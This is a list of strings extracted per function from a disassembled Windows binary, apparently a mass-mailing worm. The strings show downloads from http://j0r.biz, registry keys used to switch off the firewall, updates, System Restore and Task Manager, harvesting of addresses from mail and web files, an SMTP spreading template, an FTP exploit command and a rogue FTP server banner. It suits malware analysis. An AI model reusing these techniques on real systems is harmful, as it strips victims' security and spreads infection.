sub_4A3DFF(0cf1): "\\windows.exe" "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... "WIN" |
sub_4A3320(0cf1): "\\windows.exe" "SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"... "WIN" |
sub_4A8423(10a3): "%s" "." "." "%s" |
sub_4A76E8(1310): "rb" |
sub_4A6B78(1e82): "\r\n" |
sub_4A6A0A(25cf): "DnsQuery_A" |
sub_4A3183(3b19): "\\attach.tmp" |
sub_4A30CE(3b19): "\\windows.exe" |
sub_4A4F60(5564): ":\\" |
sub_4A85C7(565b): "%d.%d.%d.%d" "%s" |
sub_4A4379(6019): "\\xzy6.tmp" "r" "\\xzy6.tmp" "a" "%s\n" |
sub_4A2FEA(6326): "\\update3.exe" "open" |
sub_4A3081(6326): "\\bxt.com" "open" |
sub_4A77B1(6384): "%d.%d.%d.%d" |
sub_4A4D6A(7038): "\\" "*.*" "\\" |
sub_4A488F(781e): "rb" "rb" |
sub_4A79D3(7f31): "%s" "." "." "." "." "%i.%i.%i.%i" "echo open %s %d > exploit.ftp&echo user"... |
sub_4A8850(8405): "SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"... "Symantec" "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... "Symantec" |
sub_4A2FA0(9301): "\\update3.exe" "http://j0r.biz/update3.exe" |
sub_4A3037(9301): "\\bxt.com" "http://j0r.biz/proto.com" |
sub_4A86BC(93bb): "%d.%d.%d.%d" "%s" |
sub_4A5012(9bdd): "\\xzy6.tmp" "rb" "rb" |
sub_4A4BCC(a5db): "htm" "wab" "html" "dbx" "tbb" "adb" "txt" "asp" |
sub_4A397F(be29): "SOFTWARE\\Microsoft\\Security Center" "FirewallDisableNotify" |
sub_4A387F(be29): "Software\\Policies\\Microsoft\\Windows\\Win"... "AUOptions" |
sub_4A347F(be29): "SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"... "DisableSR" |
sub_4A357F(be29): "SOFTWARE\\Policies\\Microsoft\\WindowsFire"... "EnableFirewall" |
sub_4A39FF(be29): "SOFTWARE\\Microsoft\\Security Center" "UpdatesDisableNotify" |
sub_4A33FF(be29): "SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"... "DisableSR" |
sub_4A3BFF(be29): "Software\\Microsoft\\Windows\\CurrentVersi"... "DisableTaskMgr" |
sub_4A35FF(be29): "SOFTWARE\\Policies\\Microsoft\\WindowsFire"... "EnableFirewall" |
sub_4A34FF(be29): "SOFTWARE\\Policies\\Microsoft\\WindowsFire"... "EnableFirewall" |
sub_4A37FF(be29): "Software\\Policies\\Microsoft\\Windows\\Win"... "AUOptions" |
sub_4A36FF(be29): "Software\\Policies\\Microsoft\\Windows\\Win"... "NoAutoUpdate" |
sub_4A3B7F(be29): "SOFTWARE\\Microsoft\\Security Center" "AntiVirusDisableNotify" |
sub_4A3CFF(be29): "Software\\Microsoft\\Windows\\CurrentVersi"... "DisableRegistryTools" |
sub_4A3C7F(be29): "Software\\Microsoft\\Windows\\CurrentVersi"... "DisableTaskMgr" |
sub_4A3D7F(be29): "Software\\Microsoft\\Windows\\CurrentVersi"... "DisableRegistryTools" |
sub_4A3A7F(be29): "SOFTWARE\\Microsoft\\Security Center" "UpdatesDisableNotify" |
sub_4A38FF(be29): "SOFTWARE\\Microsoft\\Security Center" "FirewallDisableNotify" |
sub_4A367F(be29): "SOFTWARE\\Policies\\Microsoft\\WindowsFire"... "EnableFirewall" |
sub_4A377F(be29): "Software\\Policies\\Microsoft\\Windows\\Win"... "NoAutoUpdate" |
sub_4A42C0(c121): "." |
sub_4A3FC4(c2b3): "www.symantec.com" "86400" |
sub_4A6249(dd33): "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm"... |
sub_4A65D5(defd): "\\attach.tmp" "MAIL FROM: <%s%s>\r\n" "RCPT TO: <%s>\r\n" "DATA\r\n" "FROM: %s%s\r\n" "TO: %s\r\n" "SUBJECT:%s\r\n" "MIME-Version: 1.0\r\n" "X-Priotity: 3\r\n" "X-MSMail-Priority: Normal\r\n" "Content-Type: multipart/mixed; boundary"... "\r\n" "----------bound--\r\n" "Content-Type: text/plain; charset=us-as"... "\r\n" "%s" "----------bound--\r\n" "Content-Type: application/octet-stream;"... "\r\n" "FAILED" "\r\n" "\r\n.\r\n" "QUIT\r\n" |
sub_4A6DD0(fa57): "220 StnyFtpd 0wns j0\n" "%s %s" "USER" "331 Password required\n" "PASS" "230 User logged in.\n" "SYST" "215 StnyFtpd\n" "REST" "350 Restarting.\n" "PWD" "257 \"/\" is current directory.\n" "TYPE" "A" "200 Type set to A.\n" "TYPE" "I" "200 Type set to I.\n" "PASV" "425 Passive not supported on this serve"... "LIST" "226 Transfer complete\n" "PORT" "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"... "%x%x\n" "%s.%s.%s.%s" "200 PORT command successful.\n" "RETR" "150 Opening BINARY mode data connection"... "226 Transfer complete.\n" "425 Can't open data connection.\n" "QUIT" "221 Goodbye happy r00ting.\n" |